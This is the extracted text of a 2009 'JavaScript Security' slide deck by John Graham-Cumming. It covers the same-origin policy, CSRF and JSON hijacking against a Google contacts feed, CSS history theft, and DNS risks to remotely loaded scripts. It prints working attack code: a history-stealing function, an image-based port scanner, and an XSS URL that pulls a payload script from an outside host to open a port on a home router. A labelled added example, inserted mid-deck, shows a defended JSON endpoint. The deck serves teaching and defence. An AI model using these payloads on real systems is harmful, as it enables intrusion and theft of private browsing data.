e072465de13378577c98294b5d8e9587.ppt
- Number of slides: 41
JavaScript Security
John Graham-Cumming
Living in a powder keg and giving off sparks
• JavaScript security is a mess
• The security model is outdated
• Key examples
• Attacking DNS to attack JavaScript
• What are we going to do?
Page 2 September 25, 2009
The JavaScript Sandbox
• JavaScript security dates to 1995
• Two key concerns:
  • Stop a malicious web site from attacking your computer
  • Stop a malicious web site from interacting with another web site
The Death of the PC
• If all your documents are in the cloud, what good is protecting your PC?
• The JavaScript sandbox does nothing to prevent cloud attacks
• Who cares if a web site is prevented from reading your “My Documents”: it’s empty
The Same Origin Policy
• Scripts running on one page can’t interact with other pages
• For example, scripts loaded by jgc.org can’t access virusbtn.com
• But the Same Origin Policy doesn’t apply to the scripts themselves
Script Escalation
• Scripts can load other scripts
• Get a foothold and you can do anything
Cross-Site Request Forgery
• Hijack cookies to use a session for bad purposes
• Enhance with JavaScript for complex transactions
CSRF Example: Google Mail
• Steal the authenticated user’s contacts:
  http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999
  google({ Success: true, Errors: [], Body: {…
CSRF Example: Google Mail
• Full exploit
  function google(data){ var emails, i; for
JSON Hijacking
• CSRF attack against JSON objects
• Works by redefining the Object constructor in JavaScript
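To show why the callback-style contacts feed in the Google Mail example is readable from any site, and what a defended endpoint looks like, here is an added example (not from the slides, and not Google’s code): a simulated server in plain Node.js that serves the same data either as executable JSONP or behind a same-origin-only header check plus an unparseable prefix. The `X-Requested-With` check, the `)]}'` prefix convention and the sample contact data are assumptions for illustration.

```javascript
// Added example: why a JSONP-style contacts feed is hijackable and how to serve it safely.
// Everything here is simulated in-process (no network); the contact data is constructed.
const contacts = { Success: true, Errors: [], Body: { Contacts: [{ Email: 'alice@example.com' }] } };

// Vulnerable shape: the response is executable JavaScript, so any site can load it with
// <script src="...?callback=google">, the browser attaches the victim's cookies, and the
// attacker's own google() function receives the data.
function vulnerableResponse(callbackName) {
  return `${callbackName}(${JSON.stringify(contacts)})`;
}

// Hardened shape: (1) only answer requests carrying a header that a cross-site <script>
// or <img> load cannot set (assumed convention: X-Requested-With), and (2) prefix the body
// with a token that is a syntax error as JavaScript, so it can never run as a script.
const ANTI_HIJACK_PREFIX = ")]}'\n";
function hardenedResponse(headers) {
  if (headers['x-requested-with'] !== 'XMLHttpRequest') {
    return { status: 403, body: '' };          // plain script/image loads are refused
  }
  return { status: 200, body: ANTI_HIJACK_PREFIX + JSON.stringify(contacts) };
}

// Same-origin client: an XHR can read the raw text, strip the prefix and parse it.
function parseProtectedBody(body) {
  if (!body.startsWith(ANTI_HIJACK_PREFIX)) throw new Error('unexpected body');
  return JSON.parse(body.slice(ANTI_HIJACK_PREFIX.length));
}

// Models what a <script src=...> inclusion does: evaluate the body as JavaScript with the
// attacker's callback in scope. Returns the captured data, or null if evaluation failed.
function simulateScriptInclude(body) {
  let captured = null;
  const google = (data) => { captured = data; };   // attacker-defined callback
  try {
    new Function('google', body)(google);
  } catch (e) {
    return null;                                    // SyntaxError: nothing leaks
  }
  return captured;
}
```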
Stealing history with JavaScript and CSS
• Use JavaScript to look at the ‘visited’ color of links
  function stealHistory() {
    for (var i = 0; i < websites.length; i++) {
      var link = document.createElement("a");
      link.id = "id" + i;
      link.href = websites[i];
      link.innerHTML = websites[i];
      document.body.appendChild(link);
      var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
      document.body.removeChild(link);
      if (color == "rgb(0, 0, 255)") {
        document.write('' + websites[i] + '');
      }
    }
  }
Sandbox Holes
• Sandbox not immune to actual security holes
• Most recent was the Google V8 JavaScript engine: Google Chrome V8 JavaScript Engine Remote Code Execution Vulnerability, Bugtraq: 36149
No Turing Test in JavaScript
• No way to distinguish between an actual click by the user and a JavaScript click
• Can’t tell whether a user initiated an action or not
Attacking your home firewall
• XSS attack on BT Home Hub to use UPnP to open a port
  http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/blog/bt-home-flubpwnin-the-bt-home-hub5/payload.xss'%3e%3c/script%3e%3ca%20b=
Port scanning in JavaScript
• Port scan using images
  var AttackAPI = {
    version: '0.1',
    author: 'Petkov (architect)',
    homepage: 'http://www.gnucitizen.org'
  };
  AttackAPI.PortScanner = {};
  // Probe one port: load http://target:port as an image; onerror/onload fire
  // if anything answered, otherwise the timeout declares the port closed.
  AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
    var timeout = (timeout == null) ? 100 : timeout;
    var img = new Image();
    img.onerror = function () {
      if (!img) return;
      img = undefined;
      callback(target, port, 'open');
    };
    img.onload = img.onerror;
    img.src = 'http://' + target + ':' + port;
    setTimeout(function () {
      if (!img) return;
      img = undefined;
      callback(target, port, 'closed');
    }, timeout);
  };
  AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout) {
    for (var index = 0; index < ports.length; index++)
      AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);
  };
DNS Attacks
• Attacks on DNS are real (Kaminsky et al.)
• If you can alter the DNS of one remote JavaScript you can take over the page
• For example, google-analytics.com is on 47% of the top 1,000 web sites
• 69% of the top 1,000 load a web analytics solution remotely
• 97% load something remotely
Attacking TechCrunch
TechCrunch and JavaScript
• 18 remotely loaded JavaScripts
• mediaplex.com, scorecardresearch.com, quantserve.com, ixnp.com, doubleclick.net, googlesyndication.com, crunchboard.com, snap.com, tweetmeme.com, googleanalytics.com
• Additional embedded